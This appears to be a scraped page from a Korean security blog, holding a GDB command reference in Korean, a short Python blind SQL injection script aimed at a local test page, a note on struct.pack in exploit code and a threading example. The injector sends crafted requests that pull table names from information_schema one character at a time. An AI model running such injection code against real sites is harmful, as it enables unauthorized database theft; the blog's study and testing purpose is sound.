     명령어 목록

awatch

한 표현에 대해 watchpoint를 셋팅한다.

rwatch

한 표현에 대해 read watchpoint를 셋팅한다.

watch

한 표현에 대해 watchpoint를 셋팅한다.

catch

발생되는 예외를 잡아내기 위해 breakpoint를 셋팅한다.

break

특정 라인이나 함수에 breakpoint를 셋팅한다.

clear

특정 라인이나 함수에 있던 breakpoint를 삭제한다.

delete

몇몇 breakpoint나 자동으로 출력되는 표현을 삭제한다.

disable

몇몇 breakpoint를 disable시킨다.

enable

몇몇 breakpoint를 enable시킨다.

thbreak

breakpoint를 지원하는 일시적인 하드웨어를 셋팅한다.

hbreak

breakpoint를 지원하는 하드웨어를 셋팅한다.

tbreak

일시적인 breakpoint를 셋팅한다.

condition

breakpoint 번호 N을 오직 COND가 참일 경우에만 분기하도록 지정한다.

commands

breakpoint를 만났을 때, 실행될 명령어를 셋팅한다.

ignore

breakpoint 번호 N을 무시하는 번호로 셋팅한다.

 

  파일의 상술 및 검사

     명령어 목록

show gnutarget

현재의 BFD 타겟을 셋팅한다.

cd

디버깅 중인 프로그램과 디버거를 위한 작업 디렉토리를 DIR로 셋팅한다.

pwd

작업 디렉토리를 출력한다.

core-file

메모리와 레지스터의 검사를 위한 core dump로서 FILE을 사용한다.

section

실행 파일의 섹션 SECTION의 기본 어드레스를 ADDR로 변경한다.

exec-file

순수한 메모리의 내용을 얻기 위한 프로그램으로서 FILE을 사용한다.

file  

디버깅할 프로그램으로서 FILE을 사용한다.

path

디렉토리 DIR을 목적 파일에 대한 검색 시작점으로 추가한다.

load

실행중인 프로그램 속으로 FILE을 역동적으로 로딩한다.

add-shared-symbol-files

dynamic linker의 link map에 있는 shared object로 부터 심벌을 로딩한다.
add-symbol-file 사용법 : add-symbol-file FILE ADDR

symbol-file

실행파일인 FILE로부터 심벌 테이블을 로딩한다.

set gnutarget

현재의 BFD 타겟을 셋팅한다.

list  

지정된 함수나 행을 출력한다.

reverse-search  

출력된 마지막 행에서부터 정규 표현식에 대해 역방향으로 검색한다.

search

출력된 마지막 행에서부터 정규 표현식에 대해 검색한다. (regex(3) 참조)

directory

원본 파일에 대한 검색 경로의 시작에 디렉토리 DIR을 추가한다.


  상태 조회

     명령어 목록

show

디버거에 관한 것을 보여주는 포괄적인 명령어

info

디버깅 중인 프로그램에 관한 것을 보여주는 포괄적인 명령어


  지원 도구

     명령어 목록 

if

IF 조건이 0이 아닐 경우, 지정된 명령어들을 실행한다.

while

WHILE 조건이 0이 아닐 경우, 지정된 명령어들을 실행한다.

show confirm

위험한 작동을 확인할지를 보여준다.

show history  

명령어 history 파라메터를 보여주기 위한 포괄적인 명령어이다.

show editing

명령어 라인의 편집을 보여준다.

show verbose

장황한 설명을 보여준다.

show prompt  

gdb의 프롬프트를 보여준다.

show complaints

잘못된 기호에 관해 경고 메세지의 최대 수를 보여준다.

show demangle-style

현재의 C++ 스타일을 보여준다.

show write    

실행 파일과 코어 파일에 쓰여지는 것을 보여준다.

show check range  

검사할 범위를 보여준다.

show check type

검사할 타입을 보여준다.

show language

현재의 원본 언어를 보여준다.

show remotecache

remote 타겟을 위한 cache 사용을 보여준다.

show auto-solib-add

shared library symbol의 autoloading을 보여준다.

show stop-on-solib-events

shared library event에 대한 중지를 보여준다.

show symbol-reloading

1회 실행에 여러번 재로딩하는 다이나믹 심벌 테이블을 보여준다.

show radix     

입출력 번호 radix의 디폴트 값을 보여준다.

show output-radix

값의 출력을 위한 출력 radix의 디폴트 값을 보여준다.

show input-radix

입력 숫자에 대한 입력 radix의 디폴트 값을 보여준다.

show print object

vtable 정보에 기초한 오브젝트의 파생된 타입의 출력을 보여준다.

show print vtbl

C++의 가상 함수 테이블의 출력을 보여준다.
Show printing of C++ virtual function tables.

show print static-members

C++의 static member의 출력을 보여준다.

show print address

어드레스의 출력을 보여준다.

show print array

배열의 prettyprinting을 보여준다.

show print union

유니온 내부의 출력을 보여준다.

show print pretty

구조체의 prettyprinting을 보여준다.

show print asm-demangle

분해 목록에서 C++ 이름의 결합을 보여준다.

show print sevenbit-strings

스트링에서 \nnn과 같은 8비트 문자의 출력을 보여준다.

show print demangle

심벌을 출력할 때, 인코딩된 C++ 이름의 결합을 보여준다.

show listsize

gdb가 디폴트로 출력할 소스 라인의 숫자를 보여준다.

 show height

gdb가 한 페이지에 넣을 수 있는 행수를 보여준다.

 show width

gdb가 한 라인에 넣을 수 있는 글자수를 보여준다.

 dont-repeat

이 명령을 반복하지 말라.

 help

명령어의 목록을 출력한다.

 quit

gdb를 빠져 나간다.

  source

파일명 FILE로부터 명령어들을 읽어 들인다.

  define

새로운 명령어 이름을 정의한다.

 document

사용자 정의 명령에 해설을 단다.

echo

상수 스트링을 출력한다.

make

argument로서 그 행의 나머지를 사용하는 'make' 프로그램을 실행한다.

shell

쉘 명령으로서 그 행의 나머지를 실행한다.

set confirm

위험스런 작동을 확인할지 셋팅한다.

set history

명령어 history 파라메터 셋팅에 대한 포괄적인 명령어

set editing

명령어 라인의 편집을 셋팅한다

set verbose

장황한 설명 여부를 셋팅한다.

set prompt

gdb의 프롬프트를 셋팅한다.

set complaints

잘못된 심벌에 관한 경고 메세지의 최대 갯수를 셋팅한다.

set demangle-style

현재의 C++ 스타일을 셋팅한다.

set write

실행 파일과 코어 파일에 쓰여지는 것을 셋팅한다.

set check range

검사할 범위를 셋팅한다.

set check type

검사할 타입을 셋팅한다.

set language

현재의 원본 언어를 셋팅한다.

set remotecache

remote 타겟을 위한 cache 사용을 셋팅한다.

set auto-solib-add

shared library symbol의 autoloading을 셋팅한다.

set stop-on-solib-events

shared library event에 대한 중지를 셋팅한다.

set symbol-reloading

1회 실행에 여러번 재로딩하는 다이나믹 심벌 테이블을 셋팅한다.

set radix

입출력 번호 radix의 디폴트 값을 셋팅한다.

set output-radix

값의 출력을 위한 출력 radix의 디폴트 값을 셋팅한다.

set input-radix

입력 숫자에 대한 입력 radix의 디폴트 값을 셋팅한다.

set print object

vtable 정보에 기초한 오브젝트의 파생된 타입의 출력을 셋팅한다.

set print vtbl

C++ 가상 함수 테이블의 출력을 셋팅한다.

set print static-members

C++ static member의 출력을 셋팅한다.

set print address

어드레스의 출력을 셋팅한다.

set print array

배열의 prettyprinting을 셋팅한다.

set print union

유니온 내부의 출력을 셋팅한다.

set print pretty

구조체의 prettyprinting을 셋팅한다.

set print asm-demangle

분해 목록에서 C++ 이름의 결합을 셋팅한다.

set print asm-demangle

스트링에서 \nnn과 같은 8비트 문자의 출력을 셋팅한다.

set print demangle

심벌을 출력할 때, 인코딩된 C++ 이름의 결합을 셋팅한다.

set listsize  

gdb가 디폴트로 출력할 소스 라인의 숫자를 셋팅한다.

set height

gdb가 한 페이지에 넣을 수 있는 행수를 셋팅한다.

set width   

gdb가 한 라인에 넣을 수 있는 글자수를 셋팅한다.

down-silently

'down' 명령어와 동일

up-silently  

'up' 명령어와 동일

 

  사용자 정의 명령어

    이 명령어들은 사용자의 정의에 의해서 만들어진다.
    "define" 명령을 써서 명령어를 정의하라.

  다른 명령어들의 별칭

     명령어 목록 

ni

명령어 하나를 진행한다.

si

명령어 하나를 정확하게 진행한다.

where

모든 스택 프레임을 역추적하면서 그 값을 출력한다.

disable breakpoints

 몇몇 breakpoint를 disable시킨다.


  기 타

     명령어 목록 

complete

명령어로서 그 행의 나머지에 대해 완성된 것을 출력한다.

remote <command>

remote 모니터로 명령을 보낸다.

stop

'stop' 명령어가 없지만, 당신은 'stop'에 대한 hook를 셋팅할 수 있다.
이것은 프로그램 중지가 실행될 때마다 명령어 목록을 셋팅할 수 있게 허용한다.


  유지보수 명령어

    몇몇 gdb 명령어들은 gdb 유지보수자에 의한 사용을 위해 제공되어진다. 이들 명령어들은 자주 변하기 쉬우며, 사용자 명령어들 처럼 상세한 설명이 되어 있지 않다.

     명령어 목록 

show watchdog

watchdog 타이머를 보여준다.

show targetdebug

디버깅 중인 타겟을 보여준다.

maintenance

GDB 유지보수자에 의한 사용을 위한 명령어들

maintenance check-symtabs

psymtab과 symtab의 일관성을 검사한다.

maintenance space

공간 사용의 출력을 셋팅한다.

maintenance time

시간 사용의 출력을 셋팅한다.

maintenance demangle

C++의 분해된 이름을 결합시킨다.

maintenance dump-me

중대한 에러를 취득; 디버거가 자신의 코어를 덤프하게 한다.

maintenance print

 GDB 내부 상태 출력에 대한 유지보수 명령어

    세부 명령어
            maintenance print statistics
            maintenance print objfiles
            maintenance print psymbols
            maintenance print msymbols
            maintenance print symbols
            maintenance print type

maintenance info  

디버깅 중인 프로그램에 관한 내부 정보를 보여주기 위한 명령어

set watchdog

watchdog 타이머를 셋팅한다. non-zero일 때, 이 타임아웃은 타겟에 대해 low-level step을 끝내거나 동작을 계속하게 하기 위해 영원히 기다리는 것 대신 사용되어진다.
만약 지정된 시간 동안 타겟으로부터 응답이 없으면, 에러가 발생한다.

set targetdebug

디버깅할 타겟을 셋팅한다. non-zero일 때, 디버깅할 타겟은 활성화된다.

 

 

 

저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

[Shellcode] open-read-write(stdout)  (0) 2013.07.27
32bit unistd.h System call Number  (0) 2013.07.21
[R.O.P.] ropeme 사용하여 ROP 가젯 쉽게 구하기.  (0) 2013.04.19
PLT & GOT 심층 분석.  (0) 2013.04.05
구홍이 형이 쓰신 페도라 오버플로우 공략법 글  (0) 2013.03.05
Posted by k1rha
2013. 6. 10. 15:29

블라인드 인젝터 미리 코딩...

Web_Hacking

#python

from socket import *

import sys

import struct



IP = "127.0.0.1"

PORT = 80

STD_STR = "1 a"


def MakePacket(UNIT,NUM,RAW=0):


HEADER = "GET /mysql_test.php?id=1%26%26hex(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a1,1),"+str(UNIT)+",1))="

FOOTER = " HTTP/1.0\r\n\r\n"

SEND_PACKET =  HEADER + str(NUM) + FOOTER

return SEND_PACKET


def SendPacket(UNIT, NUM):

sock  = socket(AF_INET,SOCK_STREAM)

sock.connect((IP,PORT))

_sendData = MakePacket(UNIT,NUM)

sock.send(_sendData)

data=sock.recv(10240)

return data 


def main():

RESULT=''

for i in range (1,20):

for j in range (30,128):

RES = SendPacket(i,j)

if RES.find(STD_STR) > 0 :

RESULT = RESULT + str(j)

print RESULT.decode("hex")



if __name__== "__main__" :

main()



저작자표시 비영리 변경금지

'Web_Hacking' 카테고리의 다른 글

[white hacking] 화이트 해킹대회 web PPPPAAAASSSWWW... (150Point)  (0) 2013.09.15
[White Hacking] Serial2 web(150 point) Write-up  (0) 2013.09.15
크로스 사이트 스크립트 치트시트 (XSS Cheat sheet)  (0) 2013.01.23
웹쉘 에사용되는 함수 점검하는 스크립트~ (Script, Finding using function in webshell)  (0) 2012.11.29
Zeroboard XE 1.5.3.3 admin 페이지의 webshell 인젝션 취약점  (0) 2012.11.26
Posted by k1rha
2013. 5. 30. 22:51

[python] exploit 코드들에서 자주 나오는 lambda 사용법으로 인한 pack 에 대한 이해

Python

python exploit 코드들에서 자주 나오는 lambda 사용법으로 인한 pack 에 대한 이해 


Lambda 표현식은 C언어의 메크로 함수와 비슷한 역할을 하는 것 같다.


g = lambda x,y : x*y

>> g(2,3)

6

>> g(3,4)

12

>>


p = lambda x : pack("<L" , x)

 

"  <  "  : little endian

"  >  "  : big endian


L : Unsigned Long 형태  (32bit 에서 자주쓰임)

Q : Unsinged Long Long 형태 (64bit에서 자주 쓰임)



p(0x08040552) 하면 little endian 으로 Long 형태로 변환되어 packing 된다.





Format        C Type         Python        

x         pad byte            no value         

c         char                   string         

b         signed char         integer         

B         unsigned char       integer         

?         _Bool                 bool        

h         short                     integer         

H         unsigned short      integer         

i         int                     integer         

I         unsigned int            integer or long         

l         long                     integer         

L         unsigned long       long         

q         long long               long        

Q         unsigned long     long      

f         float                     float         

d         double             float         

s         char[]             string         

p         char[]             string         

P         void *             long         



Character       Byte order       Size and alignment

@         native         native

=         native         standard

<         little-endian           standard

>         big-endian               standard

!         network (= big-endian)  standard



thanks for 충호~


저작자표시 비영리 변경금지

'Python' 카테고리의 다른 글

[Python 2.7] Parallel Python 으로 분산처리 테스트  (0) 2013.08.06
[python2.7] Multi-Thread 와 Multi-Processing 차이와 예제코드  (0) 2013.08.04
python2.7 thread 예제 코드  (0) 2013.05.30
문자열 조합 방법 (brute forcing)  (0) 2013.04.07
[python]ZIP 파일 크랙 python 코드  (0) 2013.03.26
Posted by k1rha
2013. 5. 30. 22:51

python2.7 thread 예제 코드

Python
python2.7 thread 예제 코드 

import thread, time


def counter(id):

    for i in range(5):

        print 'id %s --> %s' % (id, i)

        time.sleep(1)



for i in range(5):

    thread.start_new_thread(counter, (i,))


time.sleep(5)

print 'Exiting'


저작자표시 비영리 변경금지

'Python' 카테고리의 다른 글

[python2.7] Multi-Thread 와 Multi-Processing 차이와 예제코드  (0) 2013.08.04
[python] exploit 코드들에서 자주 나오는 lambda 사용법으로 인한 pack 에 대한 이해  (0) 2013.05.30
문자열 조합 방법 (brute forcing)  (0) 2013.04.07
[python]ZIP 파일 크랙 python 코드  (0) 2013.03.26
[python 2.7] telnetlib를 이용한 telnet 접속하기  (0) 2012.12.21
Posted by k1rha

티스토리툴바